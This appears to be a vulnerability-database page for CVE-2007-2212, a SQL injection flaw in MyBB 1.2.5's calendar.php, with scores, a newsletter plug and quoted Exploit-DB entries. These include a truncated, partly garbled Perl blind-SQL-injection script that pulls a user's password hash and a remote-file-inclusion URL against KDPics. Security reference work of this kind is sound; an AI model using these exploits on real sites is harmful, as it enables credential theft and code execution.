CVE-2007-2212
published 2007-04-24CVE-2007-2212: Multiple SQL injection vulnerabilities in calendar.php in MyBB (aka MyBulletinBoard) 1.2.5 and earlier allow remote attackers to execute arbitrary SQL commands…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.6th percentile
Multiple SQL injection vulnerabilities in calendar.php in MyBB (aka MyBulletinBoard) 1.2.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) year or (2) month parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mybb | mybb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
exploitdb·2007-04-23
CVE-2007-2212 MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # MyBulletinBoard #\n";
print " # Example: perl mybb.pl www.host.com /mybb/ -u 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -u User-ID, default: 1 #\n";
print " # -p Proxy support #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my %options = ();
GetOptions(\%options, "u=i", "p=s");
print "[+] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
syswrite(STDOUT, "[+] MD5-Hash: ", 14);
for(my $i = 1; $i new;
my $query = "http://".$
Exploit-DB
KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion
exploitdb·2007-02-03
CVE-2006-6517 KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion
KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion
---
KDPics <= Remote File Include Vulnerability
Discovered by AsTrex "Rif Hackers Team"
URL:
http://www.phpscripts-fr.net/scripts/download.php?id=2212
V.CODE: In :KDPics/lib/exifer/exif.php
Exploit:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
Greeetz to : moroccan islam defenders ,ba azdin , xskull , savi7
# milw0rm.com [2007-02-03]
No writeups or analysis indexed.
2007-04-24
Published